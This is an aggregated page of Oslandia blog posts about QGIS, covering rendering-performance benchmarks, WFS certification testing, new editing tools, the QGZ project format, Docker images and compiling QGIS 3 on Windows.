Related Plugins and Tags

QGIS Planet

QGIS 3 and performance analysis

Context

Since last year we (the QGIS communtity) have been using QGIS-Server-PerfSuite to run performance tests on a daily basis. This way, we’re able to monitor and avoid regressions according to some test scenarios for several QGIS Server releases (currently 2.18, 3.4, 3.6 and master branches). However, there are still many questions about performance from a general point of view:

  • What is the performance of QGIS Server compared to QGIS Desktop?
  • What are the implications of feature simplification for polygons and lines?
  • Does the symbology have a strong impact on performance and in which proportion?

Of course, it’s a broad and complex topic because of the numerous possibilities offered by the rendering engine of QGIS. In this article we’ll look at typical use cases with geometries coming from a PostgreSQL database.

Methodology

The first way to monitor performance is to measure the rendering time. To do so, the Map canvas refreshis activated in the Settings of QGIS Desktop. In this way we can get the rendering time from within the Rendering tab of log messages in QGIS Desktop, as well as from log messages written by QGIS Server.

The rendering time retrieved with this method allows to get the total amount of time spent in rendering for each layer (see the source code).

But in the case of QGIS Server another interesting measure is the total time spent for a specific request, which may be read from log messages too. There are indeed more operations achieved for a single WMS request than a simple rendering in QGIS Desktop:

The rendering time extracted from QGIS Desktop corresponds to the core rendering time displayed in the sequence diagram above. Moreover, to be perfectly comparable, the rendering engine must be configured in the same way in both cases. In this way, and thanks to PyQGIS API, we can retrieve the necessary information from the Python console in QGIS Desktop, like the extent or the canvas size, in order to configure the GetMap WMS request with the appropriate WIDTH,, HEIGHT , and BBOX parameters.

Another way to examine the performance is to use a profiler in order to inspect stack traces. These traces may be represented as a FlameGraph. In this case, debug symbols are necessary, meaning that the rendering time is not representative anymore. Indeed, QGIS has to be compiled in Debug mode.

Polygons

For these tests we use the same dataset as that for the daily performance tests, which is a layer of polygons with 282,776 features.

Feature simplification deactivated

Let’s first have a look at the rendering time and the FlameGraph when the simplification is deactivated. In QGIS Desktop, the mean rendering time is 2591 ms. Using to the PyQGIS API we are able to get the extent and the size of the map to render the map again but using a GetMap WMS request this time.

In this case, the rendering time is 2469 ms and the total request time is 2540 ms. For the record, the first GetMap request is ignored because in this case, the whole QGIS project is read and cached, meaning that the total request time is much higher. But according to those results, the rendering time for QGIS Desktop and QGIS Server are utterly similar, which makes sense considering that the same rendering engine is used, but it is still very reassuring :).

Now, let’s take a look to the FlameGraph to detect where most of the time is spent.

 

Undoubtedly the FlameGraph’s are similar in both cases, meaning that if we want to improve the performance of QGIS Server we need to improve the performance of the core rendering engine, also used in QGIS Desktop. In our case the main method is QgsMapRendererParallelJob::renderLayerStatic where most of the time is spent in:

Methods Desktop % Server %
QgsExpressionContext::setFeature 6.39 6.82
QgsFeatureIterator::nextFeature 28.77 28.41
QgsFeatureRenderer::renderFeature 29.01 27.05

Basically, it may be simplified like:

Clearly, the rendering takes about 30% of the total amount of time. In this case geometry simplification could potentially help.

Feature simplification activated

Geometry simplification, available for both polygons and lines layers, may be activated and configured through layer’s Properties in the Rendering tab. Several parameters may be set:

  • Simplification may be deactivated
  • Threshold for a more drastic simplification
  • Algorithm
  • Provider simplification
  • Scale

Once the simplification activated, we varied the threshold as well as the algorithm in order to detect performance jumps:

The following conclusions can be drawn:

  • The Visvalingam algorithm should be avoided because it begins to be efficient with a high threshold, meaning a significant lack of precision in geometries
  • The ideal threshold for Snap To Grid and Distance algorithms seems to be 1.05. Indeed, considering that it’s a very low threshold, the precision of geometries is still pretty good for a major improvement in rendering time though

For now, these tests have been run on the full extent of the layer. However, we still have a Maximum scale parameter to test, so we’ve decreased the scale of the layer:

And in this case, results are pretty interesting too:

Several conclusions can be drawn:

  • Visvalingam algorithm should be avoided at low scale too
  • Snap To Grid seems counter-productive at low scale
  • Distance algorithm seems to be a good option

Lines

For these tests we also use the same dataset as that for daily performance tests, which is a layer of lines with 125,782 features.

Feature simplification activated

In the same way as for polygons we have tested the effect of the geometric simplification on the rendering time, as well as algorithms and thresholds:

In this case we have exactly the same conclusion as for polygons: the Distance algorithm should be preferred with a threshold of 1.05.

For QGIS Server the mean rendering time is about 1180 ms with geometry simplification compared to 1108 ms for QGIS Desktop, which is totally consistent. And looking at the FlameGraph we note that once again most of the time is spent in accessing the PostgreSQL database (about 30%) and rendering features (about 40%).

 

 

 

 

 

Symbology

Another parameter which has an obvious impact on performance is the symbology used to draw the layers. Some features are known to be time consuming, but we’ve felt that a a thorough study was necessary to verify it.

 

Firstly, we’ve studied the influence of the width as well as the Single Symbol type on the rendering time.

Some points are noteworthy:

Simple Line is clearly the less time consuming

– Beyond the default 0.26 line width, rendering time begins to raise consequently with a clear jump in performance

 

Another interesting feature is the Draw effects option, allowing to add some fancy effects (shadow, glow, …).

However, this feature is known to be particularly CPU consuming. Actually, rendering all the 125,782 lines took so long that we had to to change to a lower scale, with just some a few dozen lines. Results are unequivocal:

 

The last thing we wanted to test for symbology is the effect of the Categorized classification. Here are the results for some classifications with geometry simplification activated:

  • No classification: 1108 ms
  • A simple classification using the column “classification” (8 symbols): 1148 ms
  • A classification based on a stupid expression “classification x 3″ (8 symbols): 1261 ms
  • A classification based on string comparison “toponyme like ‘Ruisseau*'” (2 symbols): 1380 ms
  • A classification with a specific width line for each category (8 symbols): 1850 ms

Considering that a simple classification does not add an excessive extra-cost, it seems that the classification process itself is not very time consuming. However, as soon as an expression is used, we can observe a slight jump in performance.

Labeling

Another important part to study regarding performance is labeling and the underlying positioning. For this test we decreased the scale and varied the Placement parameter without tuning anything.

Clearly, the parallel labeling is much more time consuming than the other placements. However, as previously stated, we used the default parameters for each positioning, meaning that the number of labels really drawn on the map differs from a placement to another.

Points

The last kind of geometries we have to study is points. Similarly to polygons and lines, we used the same dataset as that of performance tests, that is a layer with 435588 points.

In the case of points geometries geometry simplification is of course not available. So we are going to focus on symbology and the impact of marker size.

Obviously Font Marker must be used carefully because of the underlying jump in performance, as well as SVG Symbols. Moreover, contrary to Simple Marker, an increase of the size implies a drastic augmentation in time rendering.

General conclusion

Based on this factual study, several conclusions can be drawn.

Globally, FlameGraph for QGIS Desktop and QGIS Server are completely similar as well as rendering time.

It means that if we want to improve the performance of QGIS Server, we have to work on the desktop configuration and the rendering engine of the QGIS core library.

Extracting generic conclusions from our tests is very difficult, because it clearly depends on the underlying data. But let’s try to suggest some recommendations :).

Firstly, geometry simplification seems pretty efficient with lines and polygons as soon as the algorithm is chosen cautiously, and as long as your features include many vertices. It seems that the Distance algorithm with a 1.05 threshold is a good choice, with both high and low scale. However, it’s not a magic solution!

Secondly, a special care is needed with regards to symbology. Indeed, in some cases, a clear jump in performance is notable. For example, fancy effects and Font Marker SVG Symbol have to be used with caution if you’re picky on rendering time.

Thirdly, we have to be aware of the extra cost caused by labeling, especially the Parallel  placement for line geometries. On this subject, a not very well-known parameter allows to drastically reduce labeling time: the PAL candidates option. Actually, we may decrease the labeling time by reducing the number of candidates. For an explicit use case, you can take a look at the daily reports.

In any case, improving server performance in a substantial way means improving the QGIS core library directly.

Especially, we noticed thanks to FlameGraph that most of the time is spent in drawing features and managing the data from the PostgreSQL database. By the way, a legitimate question is: “How much time do we spend on waiting for the database?”. To be continued 😉

If you hit performance issues on your specific configuration or want to improve QGIS awesomeness, we provide a unique QGIS support offer at http://qgis.oslandia.com/ thanks to our team of specialists!

Funding for selective masking in QGIS is now complete!

Few months ago, Oslandia launched QGIS lab’s , a place to advertise our new ideas for QGIS, but also a place to help you find co funders to make dreams become reality.

The first initiative is about label selective masking, a feature that will allow us to achieve even more professional rendering for our maps.

Selective masking

 

Thanks to the commitment of the Swiss QGIS user group and local authorities, this work is now funded !

We now can start working hard to deliver you this great feature for QGIS 3.10

Thanks again to our funders

A last word, this is not a classical crowd funding initiative, but a classical contract for each funder.

No more reason not to contribute to free and open source software!

Nouvel outil d’édition des géométries dans QGIS : tronquer/prolonger

Sorry, this entry is only available in French.

Visualization of borehole logs with QGIS

At Oslandia, we have been working on a component based on the QGIS API for the visualization of well and borehole logs.

This component is aiming at displaying data collected vertically along wells dug underground. It mainly focuses on data organized in series of contiguous samples, and is generic enough to be used for both vertical (where the Y axis corresponds to a depth underground) and horizontal data (where the X axis corresponds to time for example). One of the main concerns was to ensure good display performances with an important volume of sample points (usually hundred of thousands sample points).

We have already been working on plot components in the past, but for specific QGIS plugins (both for timeseries and stratigraphic logs) and thought we will put these past experiences to good use by creating a more generic library.

We decided to represent sample points as geometry features in order to be able to reuse the rich symbology engine of QGIS. This allows users to represent their data whatever they like without having to rewrite an entire symbology engine. We also benefit from all the performance optimizations that have been added and polished over the years (on-the-fly geometry simplification for example).

Albeit written in Python, we achieved good display performances. The key trick was to avoid copy of data between the sample points read by QGIS and the Python graphing component. It is achieved thanks to the fact that the PyQGIS API has some functions that respect the buffer protocol.

You can have a look at the following video to see this component integrated in an existing plugin.

Visualization of borehole logs withing QGIS

It is distributed as usual under an open source license and the code repository can be found on GitHub.

Do not hesitate to contact us ( [email protected] ) if you are interested in any enhancements around this component.

New QGIS geometry editing tool: trim/extend

Oslandia is continuing to improve QGIS to offer the draftsman the same experience as with the computer-aided design (CAD) software on the market.
Today we introduce you to the “trim/extend” tool.

As its name suggests, this tool, well known to CAD draftsmen, allows you to trim / shorten or extend segments.

However, where CAD tools impose some limitations – such as using on the end of polyline segments and only on 2D objects – we wanted to go further in QGIS:
– you can modify any segment of a line or polygon geometry and not just its end;
– you can of course modify multi geometries;
– you can hang on to 3D points.

Click to view our demo video.

The tool will be available in version 3.6, but you can use it now in the development version, via the advanced Windows installer for example

This tool was developed thanks to the funding of the Megève Town Hall, which we would like to thank in particular.

It is still possible to improve the tool by offering:

– multiple selection of limits and entities to be modified;
– an option to modify the two selected entities up to their intersection point;
– better support for curved geometries in the future;
– to add topology support when using the tool.

Would you like to participate in its improvement or the development of QGIS?

Need a study or support to move from CAD to GIS?

Do not hesitate to contact us.

Follow us also on twitter or Linkedin to be informed about our new CAD tools in QGIS.

QGIS Server 3 : OGC Certification work for WFS 1.1.0

QGIS Server is an open source OGC data server which uses QGIS engine as backend. It becomes really awesome because a simple desktop qgis project file can be rendered as web services with exactly the same rendering, and without any mapfile or xml coding by hand.

QGIS Server provides a way to serve OGC web services like WMS, WCS, WFS and WMTS resources from a QGIS project, but can also extend services like GetPrint which takes advantage of QGIS’s map composer power to generate high quality PDF outputs.

Since the 3.0.2 version, QGIS Server is certified as an official OGC reference implementation for WMS 1.3.0 and reports are generated in a daily continuous integration to avoid regressions.

 

Thus, the next step was naturally to take a look at the WFS 1.1.0 thanks to the support of the QGIS Grant Program

Side note, this Grant program is made possible thanks to your direct sponsoring and micro-donations to QGIS.org.

TEAM Engine test suite for WFS 1.1.0

We use a tool provided by the OGC Compliance Program to run dedicated tests on the server : Teamengine (Test, Evaluation, And Measurement Engine).

Test suites are available through a web interface. However, for the needs of continuous integration, these tests have to be run without user interaction. In the case of WMS 1.3.0, nothing more easy than using the REST API:

$ curl "http://localhost:8081/teamengine/rest/suites/wms/1.20/run?queryable=queryable&basic=basic&capabilities-url=http://172.17.0.2/qgisserver?REQUEST=GetCapabilities%26SERVICE=WMS%26VERSION=1.3.0%26MAP=/data/teamengine_wms_130.qgs

 

However, the WFS 1.1.0 test suite does not provide a REST API and makes the situation less straightforward. We switched to using TEAM Engine directly from command line:

$ cd te_base
$ ./bin/unix/test.sh -source=wfs/1.1.0/ctl/main.ctl -form=params.xml

The params.xml file allows to configure underlying tests. In this particular case, the GetCapabilities URL of the QGIS Server to test is given.  Results are available thanks to the viewlog.sh shell script:

$ ./bin/unix/viewlog.sh -logdir=te_base/users/root/ -session=s0001
Test wfs:wfs-main type Mandatory (s0001) Failed (InheritedFailure)
   Test wfs:readiness-tests type Mandatory (s0001/d68e38807_1) Failed (InheritedFailure)
      Test ctl:SchematronValidatingParser type Mandatory (s0001/d68e38807_1/d68e588_1) Failed
      Test wfs:basic-main type Mandatory (s0001/d68e38807_1/d68e636_1) Failed (InheritedFailure)
         Test wfs:run-GetCapabilities-basic-cc-GET type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1) Failed (InheritedFailure)
            Test wfs:wfs-1.1.0-Basic-GetCapabilities-tc1 type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1095_1) Passed
               Test ctl:assert-xpath type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1095_1/d68e1234_1) Passed
            Test wfs:wfs-1.1.0-Basic-GetCapabilities-tc2 type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1100_1) Passed
               Test ctl:assert-xpath type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1100_1/d68e1305_1) Passed
            Test wfs:wfs-1.1.0-Basic-GetCapabilities-tc3 type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1105_1) Passed
               Test ctl:assert-xpath type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1105_1/d68e1558_1) Passed
               Test ctl:assert-xpath type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1105_1/d68e1582_1) Passed
               Test ctl:assert-xpath type Mandatory (s0001/d68e38807_1/d68e636_1/d68e28810_1/d68e1105_1/d68e1606_1) Passed
...
...

Finally, a Python script has been written to read these logs and generate HTML report easily readable. Thanks to our QGIS-Server-CertifSuite, providing the continuous integration infrastructure with Docker images, these reports are also generated daily.

Bugfix and Conclusion

First results were clear: a lot of work is necessary to have a QGIS Server certified for WFS 1.1.0!

We started fixing the issues one by one:

And now we have a much better support than 6 months ago

However, some work still need to be done to finally obtain the OGC certification for WFS 1.1.0. To be continued!

Please contact us if you want QGIS server to become a reference implementation for all OGC service !

French Ministry in charge of the ecological transition selected Oslandia

Ministère de la Transition Écologique et Solidaire Logo

The French ministry of the ecological transition  selected Oslandia for two of the three packages of its call for tender procedure dedicated to geomatic tools.  We are very proud to dedicate our team to one of the strongest support of geomatics and Open Source in France for the next 2 to 4 years.

First package is dedicated to expert studies covering spatial databases, software, components, protocols, norms and standards in the geomatics fields.

Second package provides support and development for QGIS,  the spatial cartridge PostGIS of PostgreSQL and their components. We are really happy to continue a common work already engaged in the previous contract.

This is again another proof that we face a major tendency of open source investment, where geomatics components are currently among the most dynamic and strongest open source projects. This is also a confirmation that actors are now integrating deeply the economic rationale of open source contribution inside their politics.

“QGZ” – A new default project file format for QGIS

Last year we had the opportunity to implement ‘.QGZ’ as  anew variant of  the QGIS 3 project file format.

This is simply a zipped container for the QGS xml file. We took benefit of that container to store the auxiliary storage database into it – only if users choose that optional format though.

In classical mode, the auxiliary database is saved as a .qgd file  along the xml file.

qgd auxiliary storage file

 

qgz file format saving

When choosing the zipped container, the qgd file falls into the qgz, and this becomes totally transparent for end users. No more issues, you can’t delete it or forget to copy it when sharing project files!

The great news today is that for qgis 3.2, qgz will be the default format!

This will offers many possibilities like embbeding:

  • Resources like fonts, SVG, color ramps, and all styling informations
  • A unified container for off-line editing embedding data into a gpkg format
  • plugins, scripts, processing algorithms and modelers

If you are interested in going further this, please contact us!

Docker images for QGIS

With support from Orange we’ve created Docker images for QGIS. All the material for building and running these images is open-source and freely available on GitHub: https://github.com/Oslandia/docker-qgis.

The docker-qgis repository includes two Docker images: qgis-build and qgis-exec.

The qgis-build image includes all the libraries and tools necessary for building QGIS from source. Building QGIS requires installing a lot of dependencies, so it might not be easy depending on the Operating System you use. The qgis-build image makes it easy and repeatable. The result of a QGIS build is Debian Stretch packages that can be used for building the qgis-exec image, as explained below.

The qgis-exec image includes a runtime environment for QGIS Server. The image makes it easy to deploy and run QGIS Server. It is meant to be be generic and usable in various contexts, and in production. There are two ways to build the qgis-exec image. It can be built from the official QGIS 3 Debian packages (http://qgis.org/debian/), or from local QGIS Debian Stretch packages that were built using the qgis-build image.

We encourage you to go test and use our images! We haven’t pushed the images to the Docker Hub yet, but this is in the plans.

Feel free to contact us on GitHub or by email for any question or request!

QGIS 3.0 has been released

We are very pleased to convey the announcement of the  QGIS 3.0 major release called “Girona”.

The whole QGIS community has been working hard on so many changes for the last two years. This version is a major step in the evolution of QGIS. There are a lot of features, and many changes to the underlying code.

At Oslandia, we pushed some great new features, a lot of bugfixes and made our best to help in synchronizing efforts with the community.

Please note that the installers and binaries are still currently being built for all platforms, Ubuntu and Windows are already there,  and Mac packages are still building.

The ChangeLog and the documentation are still being worked on so please start testing that brand new version and let’s make it stronger and stronger together. The more contributors, the better!

While QGIS 3.0 represent a lot of work, note that this version is not a “Long Term Release” and may not be as stable as required for production work.

We would like to thank all the contributors who helped making QGIS 3 a reality.

Oslandia contributors should acknowledged too : Hugo Mercier, Paul Blottière, Régis Haubourg, Vincent Mora and Loïc Bartoletti.

We also want to thank some those who supported directly important features of QGIS3 :

Orange

The QWAT / QGEP organization

The French Ministry for an Ecological and Inclusive Transition

ESG

and also Grenoble Alpes Métropole

QGIS 3.0 has been released

We are very pleased to convey the announcement of the  QGIS 3.0 major release called “Girona”.

The whole QGIS community has been working hard on so many changes for the last two years. This version is a major step in the evolution of QGIS. There are a lot of features, and many changes to the underlying code.

At Oslandia, we pushed some great new features, a lot of bugfixes and made our best to help in synchronizing efforts with the community.

Please note that the installers and binaries are still currently being built for all platforms, Ubuntu and Windows are already there,  and Mac packages are still building.

The ChangeLog and the documentation are still being worked on so please start testing that brand new version and let’s make it stronger and stronger together. The more contributors, the better!

While QGIS 3.0 represent a lot of work, note that this version is not a “Long Term Release” and may not be as stable as required for production work.

We would like to thank all the contributors who helped making QGIS 3 a reality.

Oslandia contributors should acknowledged too : Hugo Mercier, Paul Blottière, Régis Haubourg, Vincent Mora and Loïc Bartoletti.

We also want to thank some those who supported directly important features of QGIS3 :

Orange

The QWAT / QGEP organization

The French Ministry for an Ecological and Inclusive Transition

ESG

and also Grenoble Alpes Métropole

QGIS 3 compiling on Windows

As the Oslandia team work exclusively on GNU/Linux, the exercise of compiling QGIS 3 on Windows 8 is not an everyday’s task :). So we decided to share our experience, we bet that will help some of you.

Cygwin

The first step is to download Cygwin and to install it in the directory C:\cygwin (instead of the default C:\cygwin64). During the installation, select the lynx package:

 

Once installed, you have to click on the Cygwin64 Terminal icon newly created on your desktop:

Then, we’re able to install dependencies and download some other installers:

[pastacode lang=”bash” manual=”%24%20cd%20%2Fcygdrive%2Fc%2FUsers%2Fhenri%2FDownloads%0A%24%20lynx%20-source%20rawgit.com%2Ftranscode-open%2Fapt-cyg%2Fmaster%2Fapt-cyg%20%3E%20apt-cyg%0A%24%20install%20apt-cyg%20%2Fbin%0A%24%20apt-cyg%20install%20wget%20git%20flex%20bison%0A%24%20wget%20http%3A%2F%2Fdownload.microsoft.com%2Fdownload%2FD%2F2%2F3%2FD23F4D0F-BA2D-4600-8725-6CCECEA05196%2Fvs_community_ENU.exe%0A%24%20chmod%20u%2Bx%20vs_community_ENU.exe%0A%24%20wget%20https%3A%2F%2Fcmake.org%2Ffiles%2Fv3.7%2Fcmake-3.7.2-win64-x64.msi%0A%24%20wget%20http%3A%2F%2Fdownload.osgeo.org%2Fosgeo4w%2Fosgeo4w-setup-x86_64.exe%0A%24%20chmod%20u%2Bx%20osgeo4w-setup-x86_64.exe” message=”” highlight=”” provider=”manual”/]

CMake

The next step is to install CMake. To do that, double clic on the file cmake-3.7.2-win64-x64.msi previously downloaded with wget. You should choose the next options during the installation:

 

Visual Studio

Then, we have to install Visual Studio and C++ tools. Double click on the vs_community_ENU.exe file and select the Custom installation. On the next page, you have to select Visual C++ chekbox:

 

 

OSGeo4W

In order to compile QGIS, some dependencies provided by the OSGeo4W installer are required. Double click on osgeo4w-setup-x86_64.exe and select the Advanced Install mode. Then, select the next packages:

  •  expat
  • fcgi
  • gdal
  • grass
  • gsl-devel
  • iconv
  • libzip-devel
  • libspatialindex-devel
  • pyqt5
  • python3-devel
  • python3-qscintilla
  • python3-nose2
  • python3-future
  • python3-pyyaml
  • python3-mock
  • python3-six
  • qca-qt5-devel
  • qca-qt5-libs
  • qscintilla-qt5
  • qt5-devel
  • qt5-libs-debug
  • qtwebkit-qt5-devel
  • qtwebkit-qt5-libs-debug
  • qwt-devel-qt5
  • sip-qt5
  • spatialite
  • oci
  • qtkeychain

QGIS

To start this last step, we have to create a file C:\OSGeo4W\OSGeo4W-dev.bat containing something like:

[pastacode lang=”bash” manual=”%40echo%20off%20%0Aset%20OSGEO4W_ROOT%3DC%3A%5COSGeo4W64%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Co4w_env.bat%22%20%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Cqt5_env.bat%22%20%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Cpy3_env.bat%22%20%0Aset%20VS140COMNTOOLS%3D%25PROGRAMFILES(x86)%25%5CMicrosoft%20Visual%20Studio%2014.0%5CCommon7%5CTools%5C%20%0Acall%20%22%25PROGRAMFILES(x86)%25%5CMicrosoft%20Visual%20Studio%2014.0%5CVC%5Cvcvarsall.bat%22%20amd64%20%0Aset%20INCLUDE%3D%25INCLUDE%25%3B%25PROGRAMFILES(x86)%25%5CMicrosoft%20SDKs%5CWindows%5Cv7.1A%5Cinclude%20%0Aset%20LIB%3D%25LIB%25%3B%25PROGRAMFILES(x86)%25%5CMicrosoft%20SDKs%5CWindows%5Cv7.1A%5Clib%20%0Apath%20%25PATH%25%3B%25PROGRAMFILES%25%5CCMake%5Cbin%3Bc%3A%5Ccygwin%5Cbin%20%0A%40set%20GRASS_PREFIX%3D%22%25OSGEO4W_ROOT%25%5Capps%5Cgrass%5Cgrass-7.2.1%20%0A%40set%20INCLUDE%3D%25INCLUDE%25%3B%25OSGEO4W_ROOT%25%5Cinclude%20%0A%40set%20LIB%3D%25LIB%25%3B%25OSGEO4W_ROOT%25%5Clib%3B%25OSGEO4W_ROOT%25%5Clib%20%0A%0A%40cmd%20″ message=”” highlight=”” provider=”manual”/]

According to your environment, some variables should probably be adapted. Then in the Cygwin terminal:

[pastacode lang=”bash” manual=”%24%20cd%20C%3A%5C%0A%24%20git%20clone%20git%3A%2F%2Fgithub.com%2Fqgis%2FQGIS.git%0A%24%20.%2FOSGeo4W-dev.bat%0A%3E%20cd%20QGIS%2Fms-windows%2Fosgeo4w” message=”” highlight=”” provider=”manual”/]

In this directory, you have to edit the file package-nightly.cmd to replace:

[pastacode lang=”bash” manual=”cmake%20-G%20Ninja%20%5E” message=”” highlight=”” provider=”manual”/]

by:

[pastacode lang=”bash” manual=”cmake%20-G%20%22Visual%20Studio%2014%202015%20Win64%22%20%5E” message=”” highlight=”” provider=”manual”/]

Moreover, we had to update the environment variable SETUAPI_LIBRARY according to the current position of the Windows Kits file SetupAPI.Lib:

[pastacode lang=”bash” manual=”set%20SETUPAPI_LIBRARY%3DC%3A%5CProgram%20Files%20(x86)%5CWindows%20Kits%5C8.1%5CLib%5Cwinv6.3%5Cum%5Cx64%5CSetupAPI.Lib” message=”” highlight=”” provider=”manual”/]

And finally, we just have to compile with the next command:

[pastacode lang=”markup” manual=”%3E%20package-nightly.cmd%202.99.0%201%20qgis-dev%20x86_64″ message=”” highlight=”” provider=”manual”/]

Victory!

And see you soon for the generation of OSGEO4W packages 😉

Source

https://github.com/qgis/QGIS/blob/ab859c9bdf8a529df9805ff54e7250921a74d877/doc/msvc.t2t

 

 

QGIS 3 compiling on Windows

As the Oslandia team work exclusively on GNU/Linux, the exercise of compiling QGIS 3 on Windows 8 is not an everyday’s task :). So we decided to share our experience, we bet that will help some of you.

Cygwin

The first step is to download Cygwin and to install it in the directory C:\cygwin (instead of the default C:\cygwin64). During the installation, select the lynx package:

 

Once installed, you have to click on the Cygwin64 Terminal icon newly created on your desktop:

Then, we’re able to install dependencies and download some other installers:

[pastacode lang=”bash” manual=”%24%20cd%20%2Fcygdrive%2Fc%2FUsers%2Fhenri%2FDownloads%0A%24%20lynx%20-source%20rawgit.com%2Ftranscode-open%2Fapt-cyg%2Fmaster%2Fapt-cyg%20%3E%20apt-cyg%0A%24%20install%20apt-cyg%20%2Fbin%0A%24%20apt-cyg%20install%20wget%20git%20flex%20bison%0A%24%20wget%20http%3A%2F%2Fdownload.microsoft.com%2Fdownload%2FD%2F2%2F3%2FD23F4D0F-BA2D-4600-8725-6CCECEA05196%2Fvs_community_ENU.exe%0A%24%20chmod%20u%2Bx%20vs_community_ENU.exe%0A%24%20wget%20https%3A%2F%2Fcmake.org%2Ffiles%2Fv3.7%2Fcmake-3.7.2-win64-x64.msi%0A%24%20wget%20http%3A%2F%2Fdownload.osgeo.org%2Fosgeo4w%2Fosgeo4w-setup-x86_64.exe%0A%24%20chmod%20u%2Bx%20osgeo4w-setup-x86_64.exe” message=”” highlight=”” provider=”manual”/]

CMake

The next step is to install CMake. To do that, double clic on the file cmake-3.7.2-win64-x64.msi previously downloaded with wget. You should choose the next options during the installation:

 

Visual Studio

Then, we have to install Visual Studio and C++ tools. Double click on the vs_community_ENU.exe file and select the Custom installation. On the next page, you have to select Visual C++ chekbox:

 

 

OSGeo4W

In order to compile QGIS, some dependencies provided by the OSGeo4W installer are required. Double click on osgeo4w-setup-x86_64.exe and select the Advanced Install mode. Then, select the next packages:

  •  expat
  • fcgi
  • gdal
  • grass
  • gsl-devel
  • iconv
  • libzip-devel
  • libspatialindex-devel
  • pyqt5
  • python3-devel
  • python3-qscintilla
  • python3-nose2
  • python3-future
  • python3-pyyaml
  • python3-mock
  • python3-six
  • qca-qt5-devel
  • qca-qt5-libs
  • qscintilla-qt5
  • qt5-devel
  • qt5-libs-debug
  • qtwebkit-qt5-devel
  • qtwebkit-qt5-libs-debug
  • qwt-devel-qt5
  • sip-qt5
  • spatialite
  • oci
  • qtkeychain

QGIS

To start this last step, we have to create a file C:\OSGeo4W\OSGeo4W-dev.bat containing something like:

[pastacode lang=”bash” manual=”%40echo%20off%20%0Aset%20OSGEO4W_ROOT%3DC%3A%5COSGeo4W64%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Co4w_env.bat%22%20%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Cqt5_env.bat%22%20%0Acall%20%22%25OSGEO4W_ROOT%25%5Cbin%5Cpy3_env.bat%22%20%0Aset%20VS140COMNTOOLS%3D%25PROGRAMFILES(x86)%25%5CMicrosoft%20Visual%20Studio%2014.0%5CCommon7%5CTools%5C%20%0Acall%20%22%25PROGRAMFILES(x86)%25%5CMicrosoft%20Visual%20Studio%2014.0%5CVC%5Cvcvarsall.bat%22%20amd64%20%0Aset%20INCLUDE%3D%25INCLUDE%25%3B%25PROGRAMFILES(x86)%25%5CMicrosoft%20SDKs%5CWindows%5Cv7.1A%5Cinclude%20%0Aset%20LIB%3D%25LIB%25%3B%25PROGRAMFILES(x86)%25%5CMicrosoft%20SDKs%5CWindows%5Cv7.1A%5Clib%20%0Apath%20%25PATH%25%3B%25PROGRAMFILES%25%5CCMake%5Cbin%3Bc%3A%5Ccygwin%5Cbin%20%0A%40set%20GRASS_PREFIX%3D%22%25OSGEO4W_ROOT%25%5Capps%5Cgrass%5Cgrass-7.2.1%20%0A%40set%20INCLUDE%3D%25INCLUDE%25%3B%25OSGEO4W_ROOT%25%5Cinclude%20%0A%40set%20LIB%3D%25LIB%25%3B%25OSGEO4W_ROOT%25%5Clib%3B%25OSGEO4W_ROOT%25%5Clib%20%0A%0A%40cmd%20″ message=”” highlight=”” provider=”manual”/]

According to your environment, some variables should probably be adapted. Then in the Cygwin terminal:

[pastacode lang=”bash” manual=”%24%20cd%20C%3A%5C%0A%24%20git%20clone%20git%3A%2F%2Fgithub.com%2Fqgis%2FQGIS.git%0A%24%20.%2FOSGeo4W-dev.bat%0A%3E%20cd%20QGIS%2Fms-windows%2Fosgeo4w” message=”” highlight=”” provider=”manual”/]

In this directory, you have to edit the file package-nightly.cmd to replace:

[pastacode lang=”bash” manual=”cmake%20-G%20Ninja%20%5E” message=”” highlight=”” provider=”manual”/]

by:

[pastacode lang=”bash” manual=”cmake%20-G%20%22Visual%20Studio%2014%202015%20Win64%22%20%5E” message=”” highlight=”” provider=”manual”/]

Moreover, we had to update the environment variable SETUAPI_LIBRARY according to the current position of the Windows Kits file SetupAPI.Lib:

[pastacode lang=”bash” manual=”set%20SETUPAPI_LIBRARY%3DC%3A%5CProgram%20Files%20(x86)%5CWindows%20Kits%5C8.1%5CLib%5Cwinv6.3%5Cum%5Cx64%5CSetupAPI.Lib” message=”” highlight=”” provider=”manual”/]

And finally, we just have to compile with the next command:

[pastacode lang=”markup” manual=”%3E%20package-nightly.cmd%202.99.0%201%20qgis-dev%20x86_64″ message=”” highlight=”” provider=”manual”/]

Victory!

And see you soon for the generation of OSGEO4W packages 😉

Source

https://github.com/qgis/QGIS/blob/ab859c9bdf8a529df9805ff54e7250921a74d877/doc/msvc.t2t

 

 

Auxiliary Storage support in QGIS 3

For those who know how powerful QGIS can be using data defined widgets and expressions almost anywhere in styling and labeling settings, it remains today quite complex to store custom data.

For instance, moving a simple label using the label toolbar is not straightforward, that wonderful toolbar remains desperately greyed-out for manual labeling tweaks

…unless you do the following:

  • Set your vector layer editable (yes, it’s not possible with readonly data)
  • Add two columns in your data
  • Link the X property position to a column and the Y position to another

 

the Move Label map tool becomes available and ready to be used (while your layer is editable). Then, if you move a label, the underlying data is modified to store the position. But what happened if you want to fully use the Change Label map tool (color, size, style, and so on)?

 

Well… You just have to add a new column for each property you want to manage. No need to tell you that it’s not very convenient to use or even impossible when your data administrator has set your data in readonly mode…

A plugin, made some years ago named EasyCustomLabeling was made to address that issue. But it kept being full of caveats, like a dependency to another plugin (Memory layer saver) for persistence, or a full copy of the layer to label inside a memory layer which indeed led to loose synchronisation with the source layer.

Two years ago, the French Agence de l’eau Adour Garonne (a water basin agency) and the Ministry in charge of Ecology asked Oslandia to think out QGIS Enhancement proposals to port that plugin into QGIS core, among a few other things like labeling connectors or curved labels enhancements.

